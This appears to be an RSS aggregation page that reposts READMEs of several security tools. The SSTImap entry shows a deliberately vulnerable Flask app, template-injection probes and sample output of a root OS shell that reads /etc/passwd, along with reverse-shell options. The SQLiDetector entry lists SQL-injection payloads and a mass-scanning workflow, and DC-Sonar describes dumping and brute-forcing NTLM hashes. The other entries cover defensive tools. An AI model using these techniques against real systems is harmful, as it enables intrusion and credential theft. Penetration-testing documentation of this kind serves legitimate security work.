FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

SSTImap - Automatic SSTI Detection Tool With Interactive Interface

Β 

SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added new payload for Smarty without enabled {php}{/php}. Old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed, check -h for help
  • Code is changed to use newer python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python3

Server-Side Template Injection

This is an example of a simple website written in Python using Flask framework and Jinja2 template engine. It integrates user-supplied variable name in an unsafe way, as it is concatenated to the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
# SSTI VULNERABILITY:
template = f"Hello, {name}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Not only this way of using templates creates XSS vulnerability, but it also allows the attacker to inject template code, that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix

User-supplied input should be introduced in a safe way through rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
template = "Hello, {{name}}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.

After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.

To check the URL, you can use -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

╔══════╦══════╦═══════╗ β–€β–ˆβ–€
β•‘ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
β•‘ β•šβ•β•β•β•β•£ β•šβ•β•β•β•β•— β•‘ β•‘ β•‘{β•‘ _ __ ___ __ _ _ __
β•šβ•β•β•β•β•— ╠════╗ β•‘ β•‘ β•‘ β•‘*β•‘ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ β•‘ β•‘ β•‘ β•‘}β•‘ | | | | | | (_| | |_) |
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β• β•šβ•β• β•šβ•¦β• |_| |_| |_|\__,_| .__/
β”‚ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injecti on: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

╔══════╦══════╦═══════╗ β–€β–ˆβ–€
β•‘ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
β•‘ β•šβ•β•β•β•β•£ β•šβ•β•β•β•β•— β•‘ β•‘ β•‘{β•‘ _ __ ___ __ _ _ __
β•šβ•β•β•β•β•— ╠════╗ β•‘ β•‘ β•‘ β•‘*β•‘ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ β•‘ β•‘ β•‘ β•‘}β•‘ | | | | | | (_| | |_) |
β•šβ•β•β•β•β•β•β•©β•β•β•β•β•β•β• β•šβ•β• β•šβ•¦β• |_| |_| |_|\__,_| .__/
β”‚ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2 Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

To get a full list of options, use --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use -i argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.

Some commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial -u argument or url command. After that, you can use run command to check URL for SSTI.

If SSTI was found, commands can be used to start the exploitation. You can get the same exploitation capabilities, as in the predetermined mode, but you can use Ctrl+C to abort them without stopping a program.

By the way, test results are valid until target url is changed, so you can easily switch between exploitation methods without running detection test every time.

To get a full list of interactive commands, use command help in interactive mode.

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine RCE Blind Code evaluation File read File write
Mako βœ“ βœ“ Python βœ“ βœ“
Jinja2 βœ“ βœ“ Python βœ“ βœ“
Python (code eval) βœ“ βœ“ Python βœ“ βœ“
Tornado βœ“ βœ“ Python βœ“ βœ“
Nunjucks βœ“ βœ“ JavaScript βœ“ βœ“
Pug βœ“ βœ“ JavaScript βœ“ βœ“
doT βœ“ βœ“ JavaScript βœ“ βœ“
Marko βœ“ βœ“ JavaScript βœ“ βœ“
JavaScript (code eval) βœ“ βœ“ JavaScript βœ“ βœ“
Dust (<= dustjs-helpers@1.5.0) βœ“ βœ“ JavaScript βœ“ βœ“
EJS βœ“ βœ“ JavaScript βœ“ βœ“
Ruby (code eval) βœ“ βœ“ Ruby βœ“ βœ“
Slim βœ“ βœ“ Ruby βœ“ βœ“
ERB βœ“ βœ“ Ruby βœ“ βœ“
Smarty (unsecured) βœ“ βœ“ PHP βœ“ βœ“
Smarty (secured) βœ“ βœ“ PHP βœ“ βœ“
PHP (code eval) βœ“ βœ“ PHP βœ“ βœ“
Twig (<=1.19) βœ“ βœ“ PHP βœ“ βœ“
Freemarker βœ“ βœ“ Java βœ“ βœ“
Velocity βœ“ βœ“ Java βœ“ βœ“
Twig (>1.19) Γ— Γ— Γ— Γ— Γ—
Dust (> dustjs-helpers@1.5.0) Γ— Γ— Γ— Γ— Γ—

Burp Suite Plugin

Currently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.

Future plans

If you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


BlueHound - Tool That Helps Blue Teams Pinpoint The Security Issues That Actually Matter


BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network
It is a fork of NeoDash, reimagined, to make it suitable for defensive security purposes.

To get started with BlueHound, check out our introductory video, blog post and Nodes22 conference talk.


BlueHound supports presenting your data as tables, graphs, bar charts, line charts, maps and more. It contains a Cypher editor to directly write the Cypher queries that populate the reports. You can save dashboards to your database, and share them with others.

Main Features

  1. Full Automation: The entire cycle of collection, analysis and reporting is basically done with a click of a button.
  2. Community Driven: BlueHound configuration can be exported and imported by others. Sharing of knowledge, best practices, collection methodologies and more, built-into the tool itself.
  3. Easy Reporting: Creating customized report can be done intuitively, without the need to write any code.
  4. Easy Customization: Any custom collection method can be added into BlueHound. Users can even add their own custom parameters or even custom icons for their graphs.

Getting Started

ROST ISO

BlueHound can be used as part of the ROST image, which comes pre-configured with everything you need (BlueHound, Neo4j, BloodHound, and a sample dataset).
To load ROST, create a new virtual machine, and install it from the ISO like you would for a new Windows host.

BlueHound Binary

If you already have a Neo4j instance running, you can download a pre-compiled version of BlueHound from our release page. Just download the zip file suitable to your OS version, extract it, and run the binary.

Using BlueHound

  1. Connect to your Neo4j server
  2. Download SharpHound, ShotHound and the Vulnerability Scanner report parser
  3. Use the Data Import section to collect & import data into your Neo4j database.
  4. Once you have data loaded, you can use the Configurations tab to set up the basic information that is used by the queries (e.g. Domain Admins group, crown jewels servers).
  5. Finally, the Queries section can be used to prepare the reports.

BlueHound How-To

Data Collection

The Data Import Tools section can be used to collect data in a click of a button. By default, BlueHound comes preconfigured with SharpHound, ShotHound, and the Vulnerability Scanners script. Additional tools can be added for more data collection. To get started:

  1. Download the relevant tools using the globe icon
  2. Configure the tool path & arguments for each tool
  3. Run the tools

The built-in tools can be configured to automatically upload the results to your Neo4j instance.

Running & Viewing Queries

To get results for a chart, either use the Refresh icon to run a specific query, or use the Query Runner section to run queries in batches. The results will be cached even after closing BlueHound, and can be run again to get updated results.
Some charts have an Info icon which explain the query and/or provide links to additional information.

Adding & Editing Queries

You can edit the query for new and/or existing charts by using the Settings icon on the top right section of the chart. Here you can use any parameters configured with a Param Select chart, and any Edge Filtering string (see section below).

Edge Filtering

Using the Edge Filtering section, you can filter out specific relationship types for all queries that use the relevant string in their query. For example, ":FILTERED_EDGES" can be used to filter by all the selection filters.
You can also filter by a specific category (see the Info icon) or even define your own custom edge filters.

Import & Export Config

The Export Config and Import Config sections can be used to save & load your dashboard and configurations as a backup, and even shared between users to collaborate and contribute insightful queries to the security community. Don’t worry, your credentials and data won’t be exported.

Note: any arguments for data import tools are also exported, so make sure you remove any secrets before sharing your configuration.

Settings

The Settings section allows you to set some global limits on query execution – maximum query time and a limit for returned results.

Technical Info

BlueHound is a fork of NeoDash, built with React and use-neo4j. It uses charts to power some of the visualizations. You can also extend NeoDash with your own visualizations. Check out the developer guide in the project repository.

Developer Guide

Run & Build using npm

BlueHound is built with React. You'll need npm installed to run the web app.

Use a recent version of npm and node to build BlueHound. The application has been tested with npm 8.3.1 & node v17.4.0.

To run the application in development mode:

  • clone this repository.
  • open a terminal and navigate to the directory you just cloned.
  • execute npm install to install the necessary dependencies.
  • execute npm run dev to run the app in development mode.
  • the application should be available at http://localhost:3000.

To build the app for production:

  • follow the steps above to clone the repository and install dependencies.
  • execute npm run build. This will create a build folder in your project directory.
  • deploy the contents of the build folder to a web server. You should then be able to run the web app.

Questions / Suggestions

We are always open to ideas, comments, and suggestions regarding future versions of BlueHound, so if you have ideas, don’t hesitate to reach out to us at support@zeronetworks.com or open an issue/pull request on GitHub.



GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


Note: GUAC is under active development - if you are interested in contributing, please look at contributor guide and the "express interest" issue

Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph databaseβ€”normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.


Conceptually, GUAC occupies the β€œaggregation and synthesis” layer of the software supply chain transparency logical model:

A few examples of questions answered by GUAC include:

Quickstart

Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

Architecture

Here is an overview of the architecture of GUAC:

Supported input formats

Additional References

Communication

We encourage discussions to be done on github issues. We also have a public slack channel on the OpenSSF slack.

For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

Governance

Information about governance can be found here.



DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts

DC Sonar Community

Repositories

The project consists of repositories:

Disclaimer

It's only for education purposes.

Avoid using it on the production Active Directory (AD) domain.

Neither contributor incur any responsibility for any using it.

Social media

Check out our Red Team community Telegram channel

Description

Architecture

For the visual descriptions, open the diagram files using the diagrams.net tool.

The app consists of:


Functionallity

The DC Sonar Community provides functionality for analyzing AD domains for security risks related to accounts:

  • Register analyzing AD domain in the app

  • See the statuses of domain analyzing processes

  • Dump and brute NTLM hashes from set AD domains to list accounts with weak and vulnerable passwords

  • Analyze AD domain accounts to list ones with never expire passwords

  • Analyze AD domain accounts by their NTLM password hashes to determine accounts and domains where passwords repeat

Installation

Docker

In progress ...

Manually using dpkg

It is assumed that you have a clean Ubuntu Server 22.04 and account with the username "user".

The app will install to /home/user/dc-sonar.

The next releases maybe will have a more flexible installation.

Download dc_sonar_NNNN.N.NN-N_amd64.tar.gz from the last distributive to the server.

Create a folder for extracting files:

mkdir dc_sonar_NNNN.N.NN-N_amd64

Extract the downloaded archive:

tar -xvf dc_sonar_NNNN.N.NN-N_amd64.tar.gz -C dc_sonar_NNNN.N.NN-N_amd64

Go to the folder with the extracted files:

cd dc_sonar_NNNN.N.NN-N_amd64/

Install PostgreSQL:

sudo bash install_postgresql.sh

Install RabbitMQ:

sudo bash install_rabbitmq.sh

Install dependencies:

sudo bash install_dependencies.sh

It will ask for confirmation of adding the ppa:deadsnakes/ppa repository. Press Enter.

Install dc-sonar itself:

sudo dpkg -i dc_sonar_NNNN.N.NN-N_amd64.deb

It will ask for information for creating a Django admin user. Provide username, mail and password.

It will ask for information for creating a self-signed SSL certificate twice. Provide required information.

Open: https://localhost

Enter Django admin user credentials set during the installation process before.

Style guide

See the information in STYLE_GUIDE.md

Deployment for development

Docker

In progress ...

Manually using Windows host and Ubuntu Server guest

In this case, we will set up the environment for editing code on the Windows host while running Python code on the Ubuntu guest.

Set up the virtual machine

Create a virtual machine with 2 CPU, 2048 MB RAM, 10GB SSD using Ubuntu Server 22.04 iso in VirtualBox.

If Ubuntu installer asks for updating ubuntu installer before VM's installation - agree.

Choose to install OpenSSH Server.

VirtualBox Port Forwarding Rules:

Name Protocol Host IP Host Port Guest IP Guest Port
SSH TCP 127.0.0.1 2222 10.0.2.15 22
RabbitMQ management console TCP 127.0.0.1 15672 10.0.2.15 15672
Django Server TCP 127.0.0.1 8000 10.0.2.15 8000
NTLM Scrutinizer TCP 127.0.0.1 5000 10.0.2.15 5000
PostgreSQL TCP 127.0.0.1 25432 10.0.2.15 5432

Config Window

Download and install Python 3.10.5.

Create a folder for the DC Sonar project.

Go to the project folder using Git for Windows:

cd '{PATH_TO_FOLDER}'

Make Windows installation steps for dc-sonar-user-layer.

Make Windows installation steps for dc-sonar-workers-layer.

Make Windows installation steps for ntlm-scrutinizer.

Make Windows installation steps for dc-sonar-frontend.

Set shared folders

Make steps from "Open VirtualBox" to "Reboot VM", but add shared folders to VM VirtualBox with "Auto-mount", like in the picture below:

After reboot, run command:

sudo adduser $USER vboxsf

Perform logout and login for the using user account.

In /home/user directory, you can use mounted folders:

ls -l
Output:
total 12
drwxrwx--- 1 root vboxsf 4096 Jul 19 13:53 dc-sonar-user-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 10:11 dc-sonar-workers-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 14:25 ntlm-scrutinizer

Config Ubuntu Server

Config PostgreSQL

Install PostgreSQL on Ubuntu 20.04:

sudo apt update
sudo apt install postgresql postgresql-contrib
sudo systemctl start postgresql.service

Create the admin database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: admin
Shall the new role be a superuser? (y/n) y

Create the dc_sonar_workers_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_workers_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the dc_sonar_user_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_user_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the back_workers_db database:

sudo -u postgres createdb back_workers_db

Create the web_app_db database:

sudo -u postgres createdb web_app_db

Run the psql:

sudo -u postgres psql

Set a password for the admin account:

ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_workers_layer account:

ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_user_layer account:

ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';

Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:

\c back_workers_db
GRANT CONNECT ON DATABASE back_workers_db to dc_sonar_workers_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_workers_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;

Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:

\c web_app_db
GRANT CONNECT ON DATABASE web_app_db to dc_sonar_user_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_user_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;

Exit of the psql:

\q

Open the pg_hba.conf file:

sudo nano /etc/postgresql/12/main/pg_hba.conf

Add the line for the connection to allow the connection from the host machine to PostgreSQL, save changes and close the file:

# IPv4 local connections:
host all all 127.0.0.1/32 md5
host all admin 0.0.0.0/0 md5

Open the postgresql.conf file:

sudo nano /etc/postgresql/12/main/postgresql.conf

Change specified below params, save changes and close the file:

listen_addresses = 'localhost,10.0.2.15'
shared_buffers = 512MB
work_mem = 5MB
maintenance_work_mem = 100MB
effective_cache_size = 1GB

Restart the PostgreSQL service:

sudo service postgresql restart

Check the PostgreSQL service status:

service postgresql status

Check the log file if it is needed:

tail -f /var/log/postgresql/postgresql-12-main.log

Now you can connect to created databases using admin account and client such as DBeaver from Windows.

Config RabbitMQ

Install RabbitMQ using the script.

Enable the management plugin:

sudo rabbitmq-plugins enable rabbitmq_management

Create the RabbitMQ admin account:

sudo rabbitmqctl add_user admin {YOUR_PASSWORD}

Tag the created user for full management UI and HTTP API access:

sudo rabbitmqctl set_user_tags admin administrator

Open management UI on http://localhost:15672/.

Install Python3.10

Ensure that your system is updated and the required packages installed:

sudo apt update && sudo apt upgrade -y

Install the required dependency for adding custom PPAs:

sudo apt install software-properties-common -y

Then proceed and add the deadsnakes PPA to the APT package manager sources list as below:

sudo add-apt-repository ppa:deadsnakes/ppa

Download Python 3.10:

sudo apt install python3.10=3.10.5-1+focal1

Install the dependencies:

sudo apt install python3.10-dev=3.10.5-1+focal1 libpq-dev=12.11-0ubuntu0.20.04.1 libsasl2-dev libldap2-dev libssl-dev

Install the venv module:

sudo apt-get install python3.10-venv

Check the version of installed python:

python3.10 --version

Output:
Python 3.10.5
Hosts

Add IP addresses of Domain Controllers to /etc/hosts

sudo nano /etc/hosts

Layers

Set venv

We have to create venv on a level above as VM VirtualBox doesn't allow us to make it in shared folders.

Go to the home directory where shared folders located:

cd /home/user

Make deploy steps for dc-sonar-user-layer on Ubuntu.

Make deploy steps for dc-sonar-workers-layer on Ubuntu.

Make deploy steps for ntlm-scrutinizer on Ubuntu.

Config modules

Make config steps for dc-sonar-user-layer on Ubuntu.

Make config steps for dc-sonar-workers-layer on Ubuntu.

Make config steps for ntlm-scrutinizer on Ubuntu.

Run

Make run steps for ntlm-scrutinizer on Ubuntu.

Make run steps for dc-sonar-user-layer on Ubuntu.

Make run steps for dc-sonar-workers-layer on Ubuntu.

Make run steps for dc-sonar-frontend on Windows.

Open https://localhost:8000/admin/ in a browser on the Windows host and agree with the self-signed certificate.

Open https://localhost:4200/ in the browser on the Windows host and login as created Django user.



Get-AppLockerEventlog - Script For Fetching Applocker Event Log By Parsing The Win-Event Log


This script will parse all the channels of events from the win-event log to extract all the log relatives to AppLocker. The script will gather all the important pieces of information relative to the events for forensic or threat-hunting purposes, or even in order to troubleshoot. Here are the logs we fetch from win-event:

  • EXE and DLL,
  • MSI and Script,
  • Packaged app-Deployment,
  • Packaged app-Execution.

The output:

  • The result will be displayed on the screen

  • And, The result will be saved to a csv file: AppLocker-log.csv

The juicy and useful information you will get with this script are:

  • FileType,
  • EventID,
  • Message,
  • User,
  • Computer,
  • EventTime,
  • FilePath,
  • Publisher,
  • FileHash,
  • Package
  • RuleName,
  • LogName,
  • TargetUser.

PARAMETERS

HunType

This parameter specifies the type of events you are interested in, there are 04 values for this parameter:

1. All

This gets all the events of AppLocker that are interesting for threat-hunting, forensic or even troubleshooting. This is the default value.

.\Get-AppLockerEventlog.ps1 -HunType All

2. Block

This gets all the events that are triggered by the action of blocking an application by AppLocker, this type is critical for threat-hunting or forensics, and comes with high priority, since it indicates malicious attempts, or could be a good indicator of prior malicious activity in order to evade defensive mechanisms.

.\Get-AppLockerEventlog.ps1 -HunType Block |Format-Table -AutoSize

3. Allow

This gets all the events that are triggered by the action of Allowing an application by AppLocker. For threat-hunting or forensics, even the allowed applications should be monitored, in order to detect any possible bypass or configuration mistakes.

.\Get-AppLockerEventlog.ps1 -HunType Allow | Format-Table -AutoSize

4. Audit

This gets all the events generated when AppLocker would block the application if the enforcement mode were enabled (Audit mode). For threat-hunting or forensics, this could indicate any configuration mistake, neglect from the admin to switch the mode, or even a malicious action that happened in the audit phase (tuning phase).

 .\Get-AppLockerEventlog.ps1 -HunType Audit

Resource

To better understand AppLocker :

Contributing

This project welcomes contributions and suggestions.



Logwatch 7.8

Logwatch analyzes and reports on unix system logs. It is a customizable and pluggable log monitoring system which will go through the logs for a given period of time and make a customizable report. It should work right out of the package on most systems.

SQLiDetector - Helps You To Detect SQL Injection "Error Based" By Sending Multiple Requests With 14 Payloads And Checking For 152 Regex Patterns For Different Databases


Simple python script supported with BurpBouty profile that helps you to detect SQL injection "Error based" by sending multiple requests with 14 payloads and checking for 152 regex patterns for different databases.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
| S|Q|L|i| |D|e|t|e|c|t|o|r|
| Coded By: Eslam Akl @eslam3kll & Khaled Nassar @knassar702
| Version: 1.0.0
| Blog: eslam3kl.medium.com
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


Description

The main idea for the tool is scanning for Error Based SQL Injection by using different payloads like

'123
''123
`123
")123
"))123
`)123
`))123
'))123
')123"123
[]123
""123
'"123
"'123
\123

And match for 152 error regex patterns for different databases.
Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml

How does it work?

It's very simple, just organize your steps as follows

  1. Use your subdomain grabber script or tools.
  2. Pass all collected subdomains to httpx or httprobe to get only live subs.
  3. Use your links and URLs tools to grab all waybackurls like waybackurls, gau, gauplus, etc.
  4. Use URO tool to filter them and reduce the noise.
  5. Grep to get all the links that contain parameters only. You can use Grep or GF tool.
  6. Pass the final URLs file to the tool, and it will test them.

The final schema of URLs that you will pass to the tool must be like this one

https://aykalam.com?x=test&y=fortest
http://test.com?parameter=ayhaga

Installation and Usage

Just run the following command to install the required libraries.

~/eslam3kl/SQLiDetector# pip3 install -r requirements.txt 

To run the tool itself.

# cat urls.txt
http://testphp.vulnweb.com/artists.php?artist=1

# python3 sqlidetector.py -h
usage: sqlidetector.py [-h] -f FILE [-w WORKERS] [-p PROXY] [-t TIMEOUT] [-o OUTPUT]
A simple tool to detect SQL errors
optional arguments:
-h, --help show this help message and exit]
-f FILE, --file FILE [File of the urls]
-w WORKERS, --workers [WORKERS Number of threads]
-p PROXY, --proxy [PROXY Proxy host]
-t TIMEOUT, --timeout [TIMEOUT Connection timeout]
-o OUTPUT, --output [OUTPUT [Output file]

# python3 sqlidetector.py -f urls.txt -w 50 -o output.txt -t 10

BurpBounty Module

I've created a burpbounty profile that uses the same payloads add injecting them at multiple positions like

  • Parameter name
  • Parameter value
  • Headers
  • Paths

I think it's more effective and will helpful for POST request that you can't test them using the Python script.

How does it test the parameter?

What's the difference between this tool and any other one? If we have a link like this one https://example.com?file=aykalam&username=eslam3kl so we have 2 parameters. It creates 2 possible vulnerable URLs.

  1. It will work for every payload like the following
https://example.com?file=123'&username=eslam3kl
https://example.com?file=aykalam&username=123'
  1. It will send a request for every link and check if one of the patterns is existing using regex.
  2. For any vulnerable link, it will save it at a separate file for every process.

Upcoming updates

  • Output json option.
  • Adding proxy option.
  • Adding threads to increase the speed.
  • Adding progress bar.
  • Adding more payloads.
  • Adding BurpBounty Profile.
  • Inject the payloads in the parameter name itself.

If you want to contribute, feel free to do that. You're welcome :)

Thanks to

Thanks to Mohamed El-Khayat and Orwa for the amazing paylaods and ideas. Follow them and you will learn more

https://twitter.com/Mohamed87Khayat
https://twitter.com/GodfatherOrwa

Stay in touch <3

LinkedIn | Blog | Twitter



Popeye - A Kubernetes Cluster Resource Sanitizer

Popeye - A Kubernetes Cluster Sanitizer

Popeye is a utility that scans live Kubernetes cluster and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.

Popeye is a readonly tool, it does not alter any of your Kubernetes resources in any way!


Installation

Popeye is available on Linux, OSX and Windows platforms.

  • Binaries for Linux, Windows and Mac are available as tarballs in the release page.

  • For OSX/Unit using Homebrew/LinuxBrew

    brew install derailed/popeye/popeye
  • Building from source Popeye was built using go 1.12+. In order to build Popeye from source you must:

    1. Clone the repo

    2. Add the following command in your go.mod file

      replace (
      github.com/derailed/popeye => MY_POPEYE_CLONED_GIT_REPO
      )
    3. Build and run the executable

      go run main.go

    Quick recipe for the impatient:

    # Clone outside of GOPATH
    git clone https://github.com/derailed/popeye
    cd popeye
    # Build and install
    go install
    # Run
    popeye

PreFlight Checks

  • Popeye uses 256 colors terminal mode. On `Nix system make sure TERM is set accordingly.

    export TERM=xterm-256color

Sanitizers

Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch'in to make Popeye even better.

The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...

Popeye is not another static analysis tool. It runs and inspect Kubernetes resources on live clusters and sanitize resources as they are in the wild!

Here is a list of some of the available sanitizers:

Resource Sanitizers Aliases

Node no
Conditions ie not ready, out of mem/disk, network, pids, etc
Pod tolerations referencing node taints
CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM)

Namespace ns
Inactive
Dead namespaces

Pod po
Pod status
Containers statuses
ServiceAccount presence
CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM)
Container image with no tags
Container image using latest tag
Resources request/limits presence
Probes liveness/readiness presence
Named ports and their references

Service svc
Endpoints presence
Matching pods labels
Named ports and their references

ServiceAccount sa
Unused, detects potentially unused SAs

Secrets sec
Unused, detects potentially unused secrets or associated keys

ConfigMap cm
Unused, detects potentially unused cm or associated keys

Deployment dp, deploy
Unused, pod template validation, resource utilization

StatefulSet sts
Unsed, pod template validation, resource utilization

DaemonSet ds
Unsed, pod template validation, resource utilization

PersistentVolume pv
Unused, check volume bound or volume error

PersistentVolumeClaim pvc
Unused, check bounded or volume mount error

HorizontalPodAutoscaler hpa
Unused, Utilization, Max burst checks

PodDisruptionBudget
Unused, Check minAvailable configuration pdb

ClusterRole
Unused cr

ClusterRoleBinding
Unused crb

Role
Unused ro

RoleBinding
Unused rb

Ingress
Valid ing

NetworkPolicy
Valid np

PodSecurityPolicy
Valid psp

You can also see the full list of codes

Save the report

